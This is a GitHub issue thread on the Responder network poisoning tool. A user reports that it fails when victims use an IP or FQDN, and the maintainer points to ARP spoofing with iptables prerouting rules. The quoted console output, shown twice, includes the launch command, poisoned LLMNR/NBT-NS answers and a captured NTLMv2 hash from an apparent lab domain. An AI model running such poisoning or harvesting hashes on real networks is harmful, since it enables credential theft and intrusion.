Closed MiMaz7707 closed 2 months ago
Who said it should?
If you want to catch those, you'll need to ARP with prerouting iptables rules.
Disruption will therefore occur.
On Tue, Jul 2, 2024, 8:31 PM MiMaz7707 @.***> wrote:
Hello,
it work fine if the victime use hostname in the UNC path, but it doesn't if the victime use server ip address or the fqdn.
`responder -I eth0 -dwv _ .----.-----.-----.-----.-----.-----.--| |.-----.----. | | -| --| | | | || - *| | || ||| ||||||| | |*_|
NBT-NS, LLMNR & MDNS Responder 3.1.4.0
To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie @.***) To kill this script hit CTRL-C
[+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [ON]
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF]
[+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF]
[+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF]
[+] Generic Options: Responder NIC [eth0] Responder IP [192.168.117.200] Responder IPv6 [fe80::9024:b852:9137:c6f] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables: Responder Machine Name [WIN-OE0U3JW4FXX] Responder Domain Name [WYT3.LOCAL] Responder DCE-RPC Port [46345]
[+] Listening for events...
[ ] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server) [ ] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d [SMB] NTLMv2-SSP Username : MYLAB\test [SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000 `
— Reply to this email directly, view it on GitHub https://github.com/lgandx/Responder/issues/280, or unsubscribe https://github.com/notifications/unsubscribe-auth/AAC5Q2G6B3FJGEM3N3WF5QLZKMZ3RAVCNFSM6AAAAABKIOVJVGVHI2DSMVQWIX3LMV43ASLTON2WKOZSGM4DOMZTGQZDKNQ . You are receiving this because you are subscribed to this thread.Message ID: @.***>
LLMNR is a name resolution protocol; there is no name to resolve when you use an IP.
Hello,
i get it, so it need to do a MiTM attack to get response from victimes that use ip address.
Thanks.
Hello,
it work fine if the victime use hostname in the UNC path, but it doesn't if the victime use server ip address or the fqdn.
`responder -I eth0 -dwv .----.-----.-----.-----.-----.-----.--| |.-----.----. | | -| --| | | | || -| _| || |__|| |_||_|||___|| |__|
To support this project: Github -> https://github.com/sponsors/lgandx Paypal -> https://paypal.me/PythonResponder
Author: Laurent Gaffie (laurent.gaffie@gmail.com) To kill this script hit CTRL-C
[+] Poisoners: LLMNR [ON] NBT-NS [ON] MDNS [ON] DNS [ON] DHCP [ON]
[+] Servers: HTTP server [ON] HTTPS server [ON] WPAD proxy [ON] Auth proxy [OFF] SMB server [ON] Kerberos server [ON] SQL server [ON] FTP server [ON] IMAP server [ON] POP3 server [ON] SMTP server [ON] DNS server [ON] LDAP server [ON] MQTT server [ON] RDP server [ON] DCE-RPC server [ON] WinRM server [ON] SNMP server [OFF]
[+] HTTP Options: Always serving EXE [OFF] Serving EXE [OFF] Serving HTML [OFF] Upstream Proxy [OFF]
[+] Poisoning Options: Analyze Mode [OFF] Force WPAD auth [OFF] Force Basic Auth [OFF] Force LM downgrade [OFF] Force ESS downgrade [OFF]
[+] Generic Options: Responder NIC [eth0] Responder IP [192.168.117.200] Responder IPv6 [fe80::9024:b852:9137:c6f] Challenge set [random] Don't Respond To Names ['ISATAP', 'ISATAP.LOCAL']
[+] Current Session Variables: Responder Machine Name [WIN-OE0U3JW4FXX] Responder Domain Name [WYT3.LOCAL] Responder DCE-RPC Port [46345]
[+] Listening for events...
[] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [] [NBT-NS] Poisoned answer sent to 192.168.117.10 for name S (service: File Server) [] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [] [LLMNR] Poisoned answer sent to 192.168.117.10 for name S [*] [LLMNR] Poisoned answer sent to fe80::4980:feb4:6fae:992d for name S [SMB] NTLMv2-SSP Client : fe80::4980:feb4:6fae:992d [SMB] NTLMv2-SSP Username : MYLAB\test [SMB] NTLMv2-SSP Hash : test::MYLAB:d2f4d55a1d326bac:D46E471C6F7E781439635BA527C2C347:010100000000000080AEA9FFDDCCDA018E011B63B184DEBE0000000002000800570059005400330001001E00570049004E002D004F0045003000550033004A005700340046005800580004003400570049004E002D004F0045003000550033004A00570034004600580058002E0057005900540033002E004C004F00430041004C000300140057005900540033002E004C004F00430041004C000500140057005900540033002E004C004F00430041004C000700080080AEA9FFDDCCDA01060004000200000008003000300000000000000001000000002000000056638E940A2EAC0BE9E6C03440C4574E6C72404BC79D31E9D138D6E79566580A0010000000000000000000000000000000000009000C0063006900660073002F005300000000000000000000000000 `